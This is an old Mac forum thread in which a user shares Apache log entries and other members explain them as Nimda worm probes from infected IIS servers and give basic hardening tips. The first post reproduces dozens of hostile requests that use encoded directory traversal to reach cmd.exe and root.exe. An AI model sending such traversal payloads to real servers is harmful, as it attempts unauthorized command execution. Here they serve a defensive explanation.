image
image

|


Go Back   macosx.com > Mac Help Forums > Mac OS X System & Mac Software

Reply
 
Thread Tools
  #1  
Old October 12th, 2001, 02:07 PM
Registered User
 
Join Date: Aug 2001
Location: USA
Posts: 48
Thanks: 0
Thanked 0 Times in 0 Posts
PowerBookDude is on a distinguished road
How sercure is OS X's Web Sharing and File Sharing?

I was just wondering how sercure is Mac OS 10.1's Web and File Sharing? Because I just started running both Web and File Sharing yesterday and today there is a lot of access. I was looking at the log file and I don't understand something What does this mean? (NOTE: I removed the IP address.)

- - [12/Oct/2001:12:12:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
- - [12/Oct/2001:12:12:12 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
- - [12/Oct/2001:12:12:12 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:12:12:17 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
- - [12/Oct/2001:12:12:41 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:12:12:41 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:12:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:12:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
- - [12/Oct/2001:12:12:43 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:12:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
- - [12/Oct/2001:12:41:09 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
- - [12/Oct/2001:12:41:09 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:12:41:10 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:12:41:10 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:12:41:10 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:41:11 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:41:11 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
- - [12/Oct/2001:12:41:11 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:12 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:15 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:15 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
- - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
- - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:12:41:17 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:14:34:31 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
- - [12/Oct/2001:14:34:34 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
- - [12/Oct/2001:14:34:36 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:14:34:36 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:14:34:37 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:14:34:38 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:14:34:39 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:14:34:40 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
- - [12/Oct/2001:14:34:41 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

Also any tips for people running Web and File Sharing to make sure everything is sercure?
Reply With Quote
  #2  
Old October 12th, 2001, 02:52 PM
marmoset's Avatar
Official Volunteer
 
Join Date: Sep 2000
Location: Ecorse, MI USA
Posts: 166
Thanks: 0
Thanked 0 Times in 0 Posts
marmoset is on a distinguished road
Re: How sercure is OS X's Web Sharing and File Sharing?

Quote:
Originally posted by PowerBookDude
I was just wondering how sercure is Mac OS 10.1's Web and File Sharing? Because I just started running both Web and File Sharing yesterday and today there is a lot of access. I was looking at the log file and I don't understand something What does this mean? (NOTE: I removed the IP address.)


{ nimda spew deleted - d.w. }

Also any tips for people running Web and File Sharing to make sure everything is sercure?
First, all the activity you are seeing is 0wned Microsoft IIS machines trying, fruitlessly, to infect you with the NIMDA worm. Being that you are running the Apache webserver platform on UNIX, you are immune to it. Those boxes were trying to infect you before you enabled Web Sharing too -- you just didn't have a piece of software listening on that port willing to log all of the attempts until now.

Apache is a solid, battle-tested web server. It's a very popular open source project, which means there are lots of sets of eyes looking at the code and correcting vulnerabilities before they can be widely exploited. In contrast, IIS is a closed project and arguably it was originally written with a pretty lax eye towards security. Only now that it has become a corporate embarassment has the developer focused upon securing it.

To keep up on security issues wrt OS X Web Sharing, I would suggest keeping an eye on http://www.apache.org and http://www.securityfocus.com
__________________
iMac DV+ (Sage), 450MHz G3
512MB RAM, 20GB HD (ATA), DVD (ATA)
ProductName: Mac OS X
ProductVersion: 10.1.4
BuildVersion: 5Q125
Reply With Quote
  #3  
Old October 12th, 2001, 03:12 PM
twyg's Avatar
Back to Mac Baby!
 
Join Date: Sep 2001
Location: NYC by day, Hudson Valley by night
Posts: 582
Thanks: 0
Thanked 0 Times in 0 Posts
twyg is on a distinguished road
Exclamation don't forget

http://www.securitytracker.com
is yet another resource to visit.
Security is quite interesting, if computers and the internet interest you...
__________________
Twyg

To laugh often and much; to win the respect of intelligent people and the affection of children...to leave the world a better place...to know even one life has breathed easier because you have lived. This is to have succeeded.
- Ralph Waldo Emerson
Reply With Quote
  #4  
Old October 12th, 2001, 06:30 PM
LordOphidian's Avatar
Adjutant On-Line
 
Join Date: Sep 2001
Location: Mesa, Az
Posts: 354
Thanks: 0
Thanked 0 Times in 0 Posts
LordOphidian is on a distinguished road
Yep thats nimda. My personal rule for running a server is, Walk softly and carry the BAN stick. Basicly, if they start hitting you like this you can try to contact them if you can, or you can just block their requests to port 80 on your machine through your firewall.

Someone gets out of line? Ban them.

Check out BrickHouse (versiontracker.com) for a good app to set up your firewall with.
__________________
iMac 800 15", Mac OS X 10.3.2
Dell OptiPlex GX200, RedHat Linux (ugg) 9
Reply With Quote
  #5  
Old October 12th, 2001, 07:34 PM
Soapvox's Avatar
Want some of my Kool-aid?
 
Join Date: Apr 2001
Location: Advertising Hell
Posts: 412
Thanks: 0
Thanked 0 Times in 0 Posts
Soapvox is on a distinguished road
What is a good log checking app

Or better yet, if I have to do it by hand where are the httpd logs normally placed?
__________________
G4 Powerbook (I Finally got my Titanium)
PHP/MySQL

Developing where ever I want!
I will help whomever asks, just IM or email me.
Reply With Quote
  #6  
Old October 13th, 2001, 01:06 AM
LordOphidian's Avatar
Adjutant On-Line
 
Join Date: Sep 2001
Location: Mesa, Az
Posts: 354
Thanks: 0
Thanked 0 Times in 0 Posts
LordOphidian is on a distinguished road
Im not running a web server on this box but Apache by default stores its logs in /var/log/httpd/
__________________
iMac 800 15", Mac OS X 10.3.2
Dell OptiPlex GX200, RedHat Linux (ugg) 9
Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Windows File Sharing Refused: Switcher needs help don_ie Networking & Compatibility 6 November 16th, 2003 08:28 AM
can't do file sharing malexgreen Networking & Compatibility 1 April 2nd, 2003 08:32 PM
Windows File Sharing on Startup? Sogni Mac OS X System & Mac Software 0 February 6th, 2003 11:48 AM
[HOWTO] - Modify the personal web sharing solrac HOWTO & FAQs 2 September 5th, 2002 11:04 PM
File Sharing never ending starting up marfry Mac OS X System & Mac Software 0 November 15th, 2000 08:22 AM


All times are GMT -5. The time now is 02:27 PM.


Mac Support® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.1.0
Copyright 2000-2008 DigitalCrowd, Inc.